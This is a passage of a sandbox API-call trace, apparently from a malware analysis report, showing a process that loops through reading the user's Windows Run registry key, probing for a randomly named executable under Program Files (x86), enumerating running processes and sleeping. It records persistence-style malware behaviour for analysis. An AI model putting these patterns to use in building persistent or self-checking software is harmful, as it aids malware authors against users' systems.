(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0287.992] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0287.993] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0287.994] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0287.994] NtClose (Handle=0x338) returned 0x0 [0287.994] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.994] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.994] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0287.994] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.994] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.995] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0287.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0287.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0287.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0288.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0288.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0288.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0288.116] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0288.118] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0288.119] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0288.119] NtClose (Handle=0x338) returned 0x0 [0288.119] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.119] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.120] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dec20) returned 1 [0288.120] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.120] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.120] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0288.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0288.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0288.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0288.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0288.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0288.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0288.328] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0288.329] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0288.330] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0288.331] NtClose (Handle=0x338) returned 0x0 [0288.331] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.331] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.331] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0288.331] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.331] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.331] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0288.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0288.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0288.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0288.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0288.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0288.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0288.462] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0288.463] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0288.464] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0288.464] NtClose (Handle=0x338) returned 0x0 [0288.464] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.464] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.464] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0288.464] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.464] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.464] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0288.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0288.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0288.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0288.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0288.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0288.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0288.571] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0288.573] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0288.574] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0288.574] NtClose (Handle=0x338) returned 0x0 [0288.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.574] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.574] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0288.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.575] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.575] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0288.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0288.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0288.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0288.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0288.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0288.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0288.681] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0288.683] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0288.684] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0288.684] NtClose (Handle=0x338) returned 0x0 [0288.684] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.684] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.684] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0288.684] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.684] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.684] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0288.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0288.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0288.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0288.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0288.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0288.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0288.836] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0288.838] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0288.838] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0288.838] NtClose (Handle=0x338) returned 0x0 [0288.838] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.838] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.839] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0288.839] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.839] NtCreateFile (in: 